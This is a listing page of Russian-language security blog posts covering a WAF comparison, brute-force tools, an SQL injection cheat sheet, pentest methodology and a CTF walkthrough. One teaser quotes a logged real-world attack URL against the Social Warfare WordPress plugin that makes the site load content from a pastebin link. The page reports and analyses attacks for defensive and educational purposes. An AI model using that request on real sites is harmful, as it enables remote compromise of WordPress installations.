27.05.2019 @ 22:57 Сравниваем бесплатные версии WAF: NAXSI vs Nemesida WAF Free naxsi, Nemesida WAF, Pentestit, SQL injection, WAF, WAF bypass, web security, XSS Сегодня мы хотим протестировать и сравнить работу двух бесплатных WAF: NAXSI и Nemesida WAF Free. В сравнении будут учитываться простота использования, качество предустановленных сигнатур, количество пропусков атак и частота ложных срабатываний. NAXSI расшифровывается как Nginx Anti XSS & SQL Injection. Работает по принципу: всё, что не разрешено — запрещено. Каждый HTTP-запрос (GET|PUT|POST) проверяется на соответствие шаблонам запрещающих правил, заданных по умолчанию в файле naxsi_core.rules. Эти правила охватывают 99% всех возможных вариантов зловредных запросов. Например, по умолчанию запрещены все запросы, в URI которых содержится символ двойной кавычки. Если для нормальной работы приложения такой символ необходим, то вручную нужно внести соответствующие исключения в белый список. Но есть и обратная сторона медали — если разрешающие правила будут проработаны плохо, то NAXSI будет блокировать еще и часть легитимных запросов. Поэтому ответственность за конечный результат разработчики модуля целиком и полностью возлагают на администратора системы. Как и большинство модулей для Nginx, NAXSI из репозитория недоступен, поэтому его придется вручную скачивать и компилировать. Nemesida WAF Free — бесплатная версия Nemesida WAF, представляющая собой динамический модуль для Nginx и обеспечивающая базовую защиту веб-приложения от атак класса OWASP на основе сигнатурного метода. Отличительной особенностью Nemesida WAF Free является собственная база сигнатур, выявляющая атаки на веб-приложения при минимальном количестве ложных срабатываний, а также: минимальные требования к аппаратным ресурсам; обновление из репозитория; установка и настройка за несколько минут; обработка содержимого всех типов HTTP-запроса; простота в обслуживании. Читать далее Сравниваем бесплатные версии WAF: NAXSI vs Nemesida WAF Free → Hekpo 9739 Web security Читать дальше >>
03.04.2019 @ 13:30 Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare Pentestit, RCE, Social Warfare, XSS Статья носит информационный характер. Не нарушайте законодательство. Некоторое время назад WAF зафиксировал атаку, которая имела следующий вид: https://defcon.ru/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf Из открытых источников мы узнали, что атака представляла собой попытку эксплуатации хранимой XSS уязвимости в Social Warfare — популярном WordpPress-плагине, установленном более чем на 70000 сайтов. Это показалось интересным и мы решили разобраться в уязвимости более детально. Читать далее Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare → Hekpo 5543 Web security Читать дальше >>
10.05.2017 @ 16:58 The Bug Hunters Methodology. Часть 2, 3. bug-bounty, bug-hunter, Methodology, pentest, web security The Bug Hunters Methodology: обнаружение цели и о составление карты архитектуры веб-приложения. Предыдущие статьи: Философия Читать далее The Bug Hunters Methodology. Часть 2, 3. → xb 9139 Penetration testing Читать дальше >>
26.04.2017 @ 0:19 Kali Linux 2017.1 kali linux, Kali Linux 2017.1 Долгожданный релиз Kali Linux 2017.1! Состоялся rolling-release Kali Linux 2017.1 , который содержит множество интересных обновлений и функций: обновленные пакеты , обновленное ядро, которое обеспечивает более качественную аппаратную поддержку, а также обновленные инструменты и нововведения. Читать далее Kali Linux 2017.1 → Romanov Roman 16413 Новости Читать дальше >>
12.04.2017 @ 18:40 Port Scan Attack Detector (PSAD) ids, IPS, psad PSAD — представляет собой набор из трех легких системных демонов, которые работают на Linux и анализируют логи iptables для обнаружения сканирования портов и наличие подозрительного трафика. Читать далее Port Scan Attack Detector (PSAD) → n0odel 10328 Network security Читать дальше >>
27.02.2017 @ 14:13 Аудит Web-приложения – систематизируем тестирование Methodology, pentest, web security В предыдущей статье я рассмотрел методологию тестирования Web-приложения. Она не является обязательным стандартом, но поможет вам не пропустить уязвимости в больших проектах. Теперь я подробнее опишу каждый из этапов. Читать далее Аудит Web-приложения – систематизируем тестирование → leksadin 9873 Penetration testing Читать дальше >>
27.01.2017 @ 14:57 Инструменты для проведения bruteforce-атак: hydra, medusa, patator bruteforce, hydra, medusa, patator, подбор паролей “Брутфорс (полный перебор, en brute force/Bruteforce, в обиходе просто брут) — метод «грубой силы» или «атака в лоб», перебор паролей, попытка подобрать пароль полным или частичным перебором. Специфика данного метода взлома состоит в том, что он не гарантирует успех подбора правильного пароля, однако процент достижения поставленной цели возрастает от количества паролей которые изначально заданы. Для этого существует несколько утилит — Hydra, Medusa, Patator. Читать далее Инструменты для проведения bruteforce-атак: hydra, medusa, patator → Progsky 33896 Penetration testing Читать дальше >>
30.12.2016 @ 13:37 Прохождение Website Practical Hacking CTF Здравствуйте. В этой статье я рассмотрю площадку для тренировок в области web-хакинга “Practical Website Hacking”. Читать далее Прохождение Website Practical Hacking → leksadin 13684 Penetration testing Читать дальше >>
19.10.2016 @ 16:20 Шпаргалка по SQL инъекциям Microsoft SQL Server, MySQL, oracle, PostgreSQL, SQL injection, SQL injection cheat sheet Шпаргалка по SQL-инъекциям создана для сводного описания технических особенностей различных типов уязвимостей SQL-injection. В статье представлены особенности проведения SQL-инъекций в MySQL, Microsoft SQL Server, ORACLE и PostgreSQL. Читать далее Шпаргалка по SQL инъекциям → leksadin 182589 Web security Читать дальше >>
19.10.2016 @ 16:06 Автоматизация использования поисковых систем google dork, information gathering, recon, SCANNER-INURLBR Вряд ли для кого то будет откровением что при неоднократном выполнении каких то повторяющиеся действий в конце концов хочется их автоматизировать чтобы высвободить время под более интересные занятия. Начальный сбор информации при проведении пентеста, в частности пассивный сбор информации, является одним из обязательных этапов, и хоть и дает простор для творчества, но по большей части представляет собой набор рутинных действий. К тому же автоматизация исключает возможность пропустить какие то проверки, что тоже не маловажно. Читать далее Автоматизация использования поисковых систем → xtalf 24091 Penetration testing Читать дальше >>